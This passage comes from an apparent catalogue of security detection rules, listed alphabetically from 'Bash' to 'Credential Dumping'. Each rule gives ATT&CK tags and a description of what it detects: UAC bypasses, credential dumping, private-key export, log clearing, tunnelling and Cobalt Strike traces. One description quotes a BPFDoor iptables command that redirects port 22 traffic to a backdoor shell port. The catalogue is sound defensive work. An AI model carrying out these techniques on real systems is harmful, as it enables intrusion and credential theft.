    Aug 12, 2024 · attack.execution

    Detects execution of the bash shell with the interactive flag "-i".

  • Binary Padding - Linux

    Aug 12, 2024 · attack.defense-evasion attack.t1027.001

    Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to append junk data to a file.

  • Binary Padding - MacOS

    Aug 12, 2024 · attack.defense-evasion attack.t1027.001

    Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to append junk data to a file.

  • Bitlocker Key Retrieval

    Aug 12, 2024 · attack.defense-evasion attack.t1078.004

    Monitor and alert for Bitlocker key retrieval.

  • BitLockerTogo.EXE Execution

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature covers the encryption of USB flash drives, SD cards, external hard disk drives, and other drives formatted with the NTFS, FAT16, FAT32, or exFAT file system. This is a rarely used application, and any usage of it is worth investigating. Malware such as Lumma stealer has been seen using this process as a target for process hollowing.

  • BITS Transfer Job Download From Direct IP

    Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197

    Detects a BITS transfer job downloading file(s) from a direct IP address.

  • BITS Transfer Job Download To Potential Suspicious Folder

    Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197

    Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location

  • BITS Transfer Job Downloading File Potential Suspicious Extension

    Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197

    Detects new BITS transfer jobs saving local files with potentially suspicious extensions

  • Bitsadmin to Uncommon IP Server Address

    Aug 12, 2024 · attack.command-and-control attack.t1071.001 attack.defense-evasion attack.persistence attack.t1197 attack.s0190

    Detects Bitsadmin connections to IP addresses instead of FQDNs

  • Bitsadmin to Uncommon TLD

    Aug 12, 2024 · attack.command-and-control attack.t1071.001 attack.defense-evasion attack.persistence attack.t1197 attack.s0190

    Detects Bitsadmin connections to domains with uncommon TLDs

  • Blackbyte Ransomware Registry

    Aug 12, 2024 · attack.defense-evasion attack.t1112

    BlackByte sets three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption

  • BloodHound Collection Files

    Aug 12, 2024 · attack.discovery attack.t1087.001 attack.t1087.002 attack.t1482 attack.t1069.001 attack.t1069.002 attack.execution attack.t1059.001

    Detects default file names output by the BloodHound collection tool SharpHound

  • Blue Mockingbird

    Aug 12, 2024 · attack.execution attack.t1112 attack.t1047 detection.emerging-threats

    Attempts to detect system changes made by Blue Mockingbird

  • Blue Mockingbird - Registry

    Aug 12, 2024 · attack.execution attack.t1112 attack.t1047

    Attempts to detect system changes made by Blue Mockingbird

  • BlueSky Ransomware Artefacts

    Aug 12, 2024 · attack.impact attack.t1486 detection.emerging-threats

    Detects access to files and shares with names and extensions used by BlueSky ransomware, which could indicate a current or previous encryption attempt.

  • Boot Configuration Tampering Via Bcdedit.EXE

    Aug 12, 2024 · attack.impact attack.t1490

    Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often used by malware or attackers as a destructive step before launching ransomware.

  • BPFDoor Abnormal Process ID or Lock File Accessed

    Aug 12, 2024 · attack.execution attack.t1106 attack.t1059

    Detects access to BPFDoor .lock and .pid files in the temporary file storage directory

  • Bpfdoor TCP Ports Redirect

    Aug 12, 2024 · attack.defense-evasion attack.t1562.004

    All TCP traffic on a particular port from the attacker host is redirected to a different port, e.g. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'. The traffic looks like encrypted SSH communication going to TCP port 22, but is in reality directed to the shell port once it hits the iptables rule, which applies to the attacker host only.

  • BPFtrace Unsafe Option Usage

    Aug 12, 2024 · attack.execution attack.t1059.004

    Detects the usage of the unsafe bpftrace option

  • Browser Execution In Headless Mode

    Aug 12, 2024 · attack.command-and-control attack.t1105

    Detects execution of a Chromium-based browser in headless mode

  • Browser Started with Remote Debugging

    Aug 12, 2024 · attack.credential-access attack.t1185

    Detects browsers starting with remote debugging flags, a technique often used to perform browser injection attacks

  • Bulk Deletion Changes To Privileged Account Permissions

    Aug 12, 2024 · attack.persistence attack.t1098

    Detects when a user is removed from a privileged role. Bulk changes should be investigated.

  • Bypass UAC Using DelegateExecute

    Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002

    Bypasses User Account Control using a fileless method

  • Bypass UAC Using Event Viewer

    Aug 12, 2024 · attack.persistence attack.t1547.010

    Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification

  • Bypass UAC Using SilentCleanup Task

    Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002

    Detects the setting of the environment variable "windir" to a non-default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.

  • Bypass UAC via CMSTP

    Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002 attack.t1218.003

    Detects command-line usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files

  • Bypass UAC via Fodhelper.exe

    Aug 12, 2024 · attack.privilege-escalation attack.t1548.002

    Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.

  • Bypass UAC via WSReset.exe

    Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1548.002

    Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.

  • C# IL Code Compilation Via Ilasm.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1127

    Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL.

  • CA Policy Removed by Non Approved Actor

    Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1548 attack.t1556

    Monitor and alert on conditional access changes where a non-approved actor removed a CA policy.

  • CA Policy Updated by Non Approved Actor

    Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1548 attack.t1556

    Monitor and alert on conditional access changes. Is the "Initiated by" actor approved to make changes? Review the modified properties and compare the "old" vs "new" values.

  • Capabilities Discovery - Linux

    Aug 12, 2024 · attack.discovery attack.t1083

    Detects usage of the "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or otherwise.

  • Capture Credentials with Rpcping.exe

    Aug 12, 2024 · attack.credential-access attack.t1003

    Detects using Rpcping.exe to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.

  • Cat Sudoers

    Aug 12, 2024 · attack.reconnaissance attack.t1592.004

    Detects the execution of cat /etc/sudoers to list all users that have sudo rights

  • Certificate Exported From Local Certificate Store

    Aug 12, 2024 · attack.credential-access attack.t1649

    Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.

  • Certificate Exported Via Certutil.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1027

    Detects the execution of certutil with the "exportPFX" flag, which allows the utility to export certificates.

  • Certificate Exported Via PowerShell

    Aug 12, 2024 · attack.credential-access attack.execution attack.t1552.004 attack.t1059.001

    Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

  • Certificate Exported Via PowerShell - ScriptBlock

    Aug 12, 2024 · attack.credential-access attack.t1552.004

    Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.

  • Certificate Private Key Acquired

    Aug 12, 2024 · attack.credential-access attack.t1649

    Detects when an application acquires a certificate private key

  • Certificate Request Export to Exchange Webserver

    Aug 12, 2024 · attack.persistence attack.t1505.003

    Detects a write of an Exchange CSR to an atypical directory or with an .aspx name suffix, which can be used to place a webshell

  • Certificate-Based Authentication Enabled

    Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1556

    Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.

  • Chafer Malware URL Pattern

    Aug 12, 2024 · attack.command-and-control attack.t1071.001

    Detects HTTP request used by Chafer malware to receive data from its C2.

  • Change Default File Association To Executable Via Assoc

    Aug 12, 2024 · attack.persistence attack.t1546.001

    Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

  • Change Default File Association Via Assoc

    Aug 12, 2024 · attack.persistence attack.t1546.001

    Detects file association changes using the built-in "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

  • Change PowerShell Policies to an Insecure Level

    Aug 12, 2024 · attack.execution attack.t1059.001

    Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.

  • Change PowerShell Policies to an Insecure Level - PowerShell

    Aug 12, 2024 · attack.execution attack.t1059.001

    Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet.

  • Change the Fax Dll

    Aug 12, 2024 · attack.defense-evasion attack.t1112

    Detects possible persistence via a Fax DLL load when the service restarts

  • Change to Authentication Method

    Aug 12, 2024 · attack.credential-access attack.t1556 attack.persistence attack.defense-evasion attack.t1098

    A change to the authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.

  • Change User Account Associated with the FAX Service

    Aug 12, 2024 · attack.defense-evasion attack.t1112

    Detects a change of the user account associated with the FAX service to avoid the escalation problem.

  • Change User Agents with WebRequest

    Aug 12, 2024 · attack.command-and-control attack.t1071.001

    Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

  • Changes to Device Registration Policy

    Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1484

    Monitor and alert for changes to the device registration policy.

  • Changes To PIM Settings

    Aug 12, 2024 · attack.privilege-escalation attack.persistence attack.t1078.004

    Detects when changes are made to PIM roles

  • Changing Existing Service ImagePath Value Via Reg.EXE

    Aug 12, 2024 · attack.persistence attack.t1574.011

    Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for the Registry to redirect from the originally specified executable to one that they control, in order to launch their own code at service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services.

  • Chmod Suspicious Directory

    Aug 12, 2024 · attack.defense-evasion attack.t1222.002

    Detects chmod targeting files in abnormal directory paths.

  • Chromium Browser Headless Execution To Mockbin Like Site

    Aug 12, 2024 · attack.execution

    Detects the execution of a Chromium-based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).

  • Cisco ASA FTD Exploit CVE-2020-3452

    Aug 12, 2024 · attack.t1190 attack.initial-access cve.2020-3452 detection.emerging-threats

    Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (successful exploitation)

  • Cisco BGP Authentication Failures

    Aug 12, 2024 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion attack.credential-access attack.collection attack.t1078 attack.t1110 attack.t1557

    Detects BGP failures which may be indicative of brute force attacks to manipulate routing

  • Cisco Clear Logs

    Aug 12, 2024 · attack.defense-evasion attack.t1070.003

    Clearing of command history in the network OS, which is used for defense evasion

  • Cisco Collect Data

    Aug 12, 2024 · attack.discovery attack.credential-access attack.collection attack.t1087.001 attack.t1552.001 attack.t1005

    Collect pertinent data from the configuration files

  • Cisco Crypto Commands

    Aug 12, 2024 · attack.credential-access attack.defense-evasion attack.t1553.004 attack.t1552.004

    Show when private keys are being exported from the device, or when new certificates are installed

  • Cisco Denial of Service

    Aug 12, 2024 · attack.impact attack.t1495 attack.t1529 attack.t1565.001

    Detects a system being shut down or put into a different boot mode

  • Cisco Disabling Logging

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Turning off logging locally or remotely

  • Cisco Discovery

    Aug 12, 2024 · attack.discovery attack.t1083 attack.t1201 attack.t1057 attack.t1018 attack.t1082 attack.t1016 attack.t1049 attack.t1033 attack.t1124

    Find information about network devices that is not stored in config files

  • Cisco File Deletion

    Aug 12, 2024 · attack.defense-evasion attack.impact attack.t1070.004 attack.t1561.001 attack.t1561.002

    See what files are being deleted from flash file systems

  • Cisco LDP Authentication Failures

    Aug 12, 2024 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion attack.credential-access attack.collection attack.t1078 attack.t1110 attack.t1557

    Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels

  • Cisco Local Accounts

    Aug 12, 2024 · attack.persistence attack.t1136.001 attack.t1098

    Find local accounts being created or modified as well as remote authentication configurations

  • Cisco Modify Configuration

    Aug 12, 2024 · attack.persistence attack.impact attack.t1490 attack.t1505 attack.t1565.002 attack.t1053

    Modifications to a config that will serve an adversary's impacts or persistence

  • Cisco Show Commands Input

    Aug 12, 2024 · attack.credential-access attack.t1552.003

    See what commands are being input into the device by other people; full credentials can be in the history

  • Cisco Sniffing

    Aug 12, 2024 · attack.credential-access attack.discovery attack.t1040

    Show when a monitor or a span/rspan is set up or modified

  • Cisco Stage Data

    Aug 12, 2024 · attack.collection attack.lateral-movement attack.command-and-control attack.exfiltration attack.t1074 attack.t1105 attack.t1560.001

    Various protocols may be used to put data on the device for exfiltration or infiltration

  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-8193 cve.2020-8195 detection.emerging-threats

    Detects exploitation attempts against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195

  • Citrix Netscaler Attack CVE-2019-19781

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2019-19781 detection.emerging-threats

    Detects CVE-2019-19781 exploitation attempts against Citrix Netscaler, Application Delivery Controller and Citrix Gateway

  • Classes Autorun Keys Modification

    Aug 12, 2024 · attack.persistence attack.t1547.001

    Detects modification of autostart extensibility point (ASEP) in registry.

  • Clear Linux Logs

    Aug 12, 2024 · attack.defense-evasion attack.t1070.002

    Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion

  • Clearing Windows Console History

    Aug 12, 2024 · attack.defense-evasion attack.t1070 attack.t1070.003

    Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.

  • Cleartext Protocol Usage

    Aug 12, 2024 · attack.credential-access

    Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that encryption is used for all sensitive information in transit. Ensure that encrypted channels are used for all administrative account access.

  • Cleartext Protocol Usage Via Netflow

    Aug 12, 2024 · attack.credential-access

    Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that encryption is used for all sensitive information in transit. Ensure that encrypted channels are used for all administrative account access.

  • ClickOnce Trust Prompt Tampering

    Aug 12, 2024 · attack.defense-evasion attack.t1112

    Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.

  • Clipboard Collection of Image Data with Xclip Tool

    Aug 12, 2024 · attack.collection attack.t1115

    Detects attempts to collect image data stored in the clipboard from users using the xclip tool. Xclip has to be installed. It is highly recommended to use this rule on servers, due to the high usage of clipboard utilities on user workstations.

  • Clipboard Collection with Xclip Tool

    Aug 12, 2024 · attack.collection attack.t1115

    Detects attempts to collect data stored in the clipboard from users using the xclip tool. Xclip has to be installed. It is highly recommended to use this rule on servers, due to the high usage of clipboard utilities on user workstations.

  • Clipboard Collection with Xclip Tool - Auditd

    Aug 12, 2024 · attack.collection attack.t1115

    Detects attempts to collect data stored in the clipboard from users using the xclip tool. Xclip has to be installed. It is highly recommended to use this rule on servers, due to the high usage of clipboard utilities on user workstations.

  • Clipboard Data Collection Via OSAScript

    Aug 12, 2024 · attack.collection attack.execution attack.t1115 attack.t1059.002

    Detects possible collection of data from the clipboard via execution of the osascript binary

  • CLR DLL Loaded Via Office Applications

    Aug 12, 2024 · attack.execution attack.t1204.002

    Detects CLR DLL being loaded by an Office Product

  • Cmd.EXE Missing Space Characters Execution Anomaly

    Aug 12, 2024 · attack.execution attack.t1059.001

    Detects Windows command lines that miss a space before or after the /c flag when running a command using cmd.exe. This could be a sign of obfuscation or of a fat-finger problem (typo by the developer).

  • CMSTP Execution Process Access

    Aug 12, 2024 · attack.defense-evasion attack.t1218.003 attack.execution attack.t1559.001 attack.g0069 attack.g0080 car.2019-04-001

    Detects various indicators of Microsoft Connection Manager Profile Installer execution

  • CMSTP Execution Process Creation

    Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218.003 attack.g0069 car.2019-04-001

    Detects various indicators of Microsoft Connection Manager Profile Installer execution

  • CMSTP Execution Registry Event

    Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1218.003 attack.g0069 car.2019-04-001

    Detects various indicators of Microsoft Connection Manager Profile Installer execution

  • Cobalt Strike DNS Beaconing

    Aug 12, 2024 · attack.command-and-control attack.t1071.004

    Detects suspicious DNS queries known from Cobalt Strike beacons

  • CobaltStrike Load by Rundll32

    Aug 12, 2024 · attack.defense-evasion attack.t1218.011

    Rundll32 can be used by Cobalt Strike with the StartW function to load DLLs from the command line.

  • CobaltStrike Named Pipe

    Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055

    Detects the creation of a named pipe as used by CobaltStrike

  • CobaltStrike Named Pipe Pattern Regex

    Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055

    Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles

  • CobaltStrike Named Pipe Patterns

    Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 stp.1k

    Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles

  • CobaltStrike Service Installations - Security

    Aug 12, 2024 · attack.execution attack.privilege-escalation attack.lateral-movement attack.t1021.002 attack.t1543.003 attack.t1569.002

    Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or moves laterally

  • CobaltStrike Service Installations - System

    Aug 12, 2024 · attack.execution attack.privilege-escalation attack.lateral-movement attack.t1021.002 attack.t1543.003 attack.t1569.002

    Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or moves laterally

  • Code Executed Via Office Add-in XLL File

    Aug 12, 2024 · attack.persistence attack.t1137.006

    Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs

  • Code Execution via Pcwutl.dll

    Aug 12, 2024 · attack.defense-evasion attack.t1218.011

    Detects the launch of an executable by calling the LaunchApplication function from the pcwutl.dll library.

  • Code Injection by ld.so Preload

    Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1574.006

    Detects the ld.so preload persistence file. See man ld.so for more information.

  • CodeIntegrity - Blocked Driver Load With Revoked Certificate

    Aug 12, 2024 · attack.privilege-escalation attack.t1543

    Detects blocked load attempts of revoked drivers

  • CodeIntegrity - Blocked Image Load With Revoked Certificate

    Aug 12, 2024 · attack.privilege-escalation

    Detects image load events blocked by code integrity because of revoked certificates.

  • CodeIntegrity - Blocked Image/Driver Load For Policy Violation

    Aug 12, 2024 · attack.privilege-escalation attack.t1543

    Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.

  • CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked

    Aug 12, 2024 · attack.privilege-escalation

    Detects block events for files that are disallowed by code integrity for protected processes

  • CodeIntegrity - Revoked Image Loaded

    Aug 12, 2024 · attack.privilege-escalation

    Detects code integrity events for loaded images with revoked certificates.

  • CodeIntegrity - Revoked Kernel Driver Loaded

    Aug 12, 2024 · attack.privilege-escalation

    Detects the load of a revoked kernel driver

  • CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module

    Aug 12, 2024 · attack.privilege-escalation

    Detects loaded kernel modules that did not meet the WHQL signing requirements.

  • CodeIntegrity - Unsigned Image Loaded

    Aug 12, 2024 · attack.privilege-escalation

    Detects an unsigned image loaded on the system

  • CodeIntegrity - Unsigned Kernel Module Loaded

    Aug 12, 2024 · attack.privilege-escalation

    Detects the presence of a loaded unsigned kernel module on the system.

  • COLDSTEEL Persistence Service Creation

    Aug 12, 2024 · attack.defense-evasion attack.persistence detection.emerging-threats

    Detects the creation of new services potentially related to COLDSTEEL RAT

  • COLDSTEEL RAT Anonymous User Process Execution

    Aug 12, 2024 · attack.persistence attack.defense-evasion detection.emerging-threats

    Detects the creation of a process executing as a user called "ANONYMOUS", as seen used by the "MileStone2016" variant of COLDSTEEL

  • COLDSTEEL RAT Cleanup Command Execution

    Aug 12, 2024 · attack.persistence attack.defense-evasion detection.emerging-threats

    Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples

  • COLDSTEEL RAT Service Persistence Execution

    Aug 12, 2024 · attack.persistence attack.defense-evasion detection.emerging-threats

    Detects the creation of an "svchost" process with specific command line flags that were seen used by ColdSteel RAT

  • COM Hijack via Sdclt

    Aug 12, 2024 · attack.privilege-escalation attack.t1546 attack.t1548

    Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'

  • COM Hijacking via TreatAs

    Aug 12, 2024 · attack.persistence attack.t1546.015

    Detects modification of the TreatAs key to enable the "rundll32.exe -sta" command

  • Command Line Execution with Suspicious URL and AppData Strings

    Aug 12, 2024 · attack.execution attack.command-and-control attack.t1059.003 attack.t1059.001 attack.t1105

    Detects a suspicious command line execution that includes a URL and an AppData string in the command line parameters, as used by several droppers (js/vbs > powershell)

  • Commands to Clear or Remove the Syslog

    Aug 12, 2024 · attack.defense-evasion attack.t1070.002

    Detects specific commands commonly used to remove or empty the syslog, which is often used by attackers as a method to hide their tracks

  • Commands to Clear or Remove the Syslog - Builtin

    Aug 12, 2024 · attack.impact attack.t1565.001

    Detects specific commands commonly used to remove or empty the syslog

  • Common Autorun Keys Modification

    Aug 12, 2024 · attack.persistence attack.t1547.001

    Detects modification of autostart extensibility point (ASEP) in registry.

  • Communication To LocaltoNet Tunneling Service Initiated

    Aug 12, 2024 · attack.command-and-control attack.t1572 attack.t1090 attack.t1102

    Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.

  • Communication To LocaltoNet Tunneling Service Initiated - Linux

    Aug 12, 2024 · attack.command-and-control attack.t1572 attack.t1090 attack.t1102

    Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.

  • Communication To Ngrok Tunneling Service - Linux

    Aug 12, 2024 · attack.exfiltration attack.command-and-control attack.t1567 attack.t1568.002 attack.t1572 attack.t1090 attack.t1102 attack.s0508

    Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden data exfiltration by malicious actors

  • Communication To Ngrok Tunneling Service Initiated

    Aug 12, 2024 · attack.exfiltration attack.command-and-control attack.t1567 attack.t1568.002 attack.t1572 attack.t1090 attack.t1102 attack.s0508

    Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using "ngrok" to store their second stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional download.

  • Communication To Uncommon Destination Ports

    Aug 12, 2024 · attack.persistence attack.command-and-control attack.t1571

    Detects programs that connect to uncommon destination ports

  • Compress Data and Lock With Password for Exfiltration With 7-ZIP

    Aug 12, 2024 · attack.collection attack.t1560.001

    An adversary may compress or encrypt data that is collected prior to exfiltration using third-party utilities.

  • Compress Data and Lock With Password for Exfiltration With WINZIP

    Aug 12, 2024 · attack.collection attack.t1560.001

    An adversary may compress or encrypt data that is collected prior to exfiltration using third-party utilities.

  • Computer Discovery And Export Via Get-ADComputer Cmdlet

    Aug 12, 2024 · attack.discovery attack.t1033

    Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

  • Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell

    Aug 12, 2024 · attack.discovery attack.t1033

    Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

  • Computer Password Change Via Ksetup.EXE

    Aug 12, 2024 · attack.execution

    Detects password change for the computer's domain account or host principal via "ksetup.exe"

  • Computer System Reconnaissance Via Wmic.EXE

    Aug 12, 2024 · attack.discovery attack.execution attack.t1047

    Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.

  • ComRAT Network Communication

    Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1071.001 attack.g0010

    Detects Turla ComRAT network communication.

  • Confluence Exploitation CVE-2019-3398

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2019-3398 detection.emerging-threats

    Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398

  • Conhost.exe CommandLine Path Traversal

    Aug 12, 2024 · attack.execution attack.t1059.003

    Detects the usage of path traversal in conhost.exe, indicating possible command/argument confusion/hijacking

  • Connection Proxy

    Aug 12, 2024 · attack.defense-evasion attack.t1090

    Detects setting proxy configuration

  • Container Residence Discovery Via Proc Virtual FS

    Aug 12, 2024 · attack.discovery attack.t1082

    Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem

  • Conti NTDS Exfiltration Command

    Aug 12, 2024 · attack.collection attack.t1560 detection.emerging-threats

    Detects a command used by Conti to exfiltrate NTDS

  • Conti Volume Shadow Listing

    Aug 12, 2024 · attack.t1587.001 attack.resource-development detection.emerging-threats

    Detects a command used by Conti to find volume shadow backups

  • Control Panel Items

    Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1218.002 attack.persistence attack.t1546

    Detects the malicious use of a control panel item

  • ConvertTo-SecureString Cmdlet Usage Via CommandLine

    Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001

    Detects usage of the "ConvertTo-SecureString" cmdlet via the command line, which is fairly uncommon and could indicate potentially suspicious activity

  • Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE

    Aug 12, 2024 · attack.credential-access

    Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share

  • Copy From Or To Admin Share Or Sysvol Folder

    Aug 12, 2024 · attack.lateral-movement attack.collection attack.exfiltration attack.t1039 attack.t1048 attack.t1021.002

    Detects a copy command or a copy utility execution to or from an Admin share or remote

  • Copy From VolumeShadowCopy Via Cmd.EXE

    Aug 12, 2024 · attack.impact attack.t1490

    Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)

  • Copy Passwd Or Shadow From TMP Path

    Aug 12, 2024 · attack.credential-access attack.t1552.001

    Detects when the file "passwd" or "shadow" is copied from a tmp path

  • Copying Sensitive Files with Credential Data

    Aug 12, 2024 · attack.credential-access attack.t1003.002 attack.t1003.003 car.2013-07-001 attack.s0404

    Detects the copying of files with well-known filenames (sensitive files with credential data)

  • CosmicDuke Service Installation

    Aug 12, 2024 · attack.persistence attack.t1543.003 attack.t1569.002 detection.emerging-threats

    Detects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.

  • CrashControl CrashDump Disabled

    Aug 12, 2024 · attack.t1564 attack.t1112

    Detects disabling of the CrashDump via the registry (as used by HermeticWiper)

  • Create Volume Shadow Copy with Powershell

    Aug 12, 2024 · attack.credential-access attack.t1003.003

    Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information

  • Created Files by Microsoft Sync Center

    Aug 12, 2024 · attack.t1055 attack.t1218 attack.execution attack.defense-evasion

    This rule detects suspicious files created by Microsoft Sync Center (mobsync)

  • Creation Exe for Service with Unquoted Path

    Aug 12, 2024 · attack.persistence attack.t1547.009

    Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.

  • Creation of a Diagcab

    Aug 12, 2024 · attack.resource-development

    Detects the creation of a diagcab file, which could be caused by some legitimate installer or be a sign of exploitation (review the filename and its location)

  • Creation of a Local Hidden User Account by Registry

    Aug 12, 2024 · attack.persistence attack.t1136.001

    Sysmon registry detection of a local hidden user account.

  • Creation Of A Local User Account

    Aug 12, 2024 · attack.t1136.001 attack.persistence

    Detects the creation of a new user account. Such accounts may be used for persistence that does not require persistent remote access tools to be deployed on the system.

  • Creation Of a Suspicious ADS File Outside a Browser Download

    Aug 12, 2024 · attack.defense-evasion

    Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers

  • Creation Of An User Account

    Aug 12, 2024 · attack.t1136.001 attack.persistence

    Detects the creation of a new user account. Such accounts may be used for persistence that does not require persistent remote access tools to be deployed on the system.

  • Cred Dump Tools Dropped Files

    Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.t1003.002 attack.t1003.003 attack.t1003.004 attack.t1003.005

    Detects the creation of files with well-known filenames (parts of credential dump software or files produced by them)

  • Credential Dumping Activity By Python Based Tool

    Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.s0349

    Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.

  • Credential Dumping Attempt Via Svchost

    Aug 12, 2024 · attack.t1548

    Detects when a process tries to access the memory of svchost to potentially dump credentials.

  • Credential Dumping Attempt Via WerFault

    Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.s0002

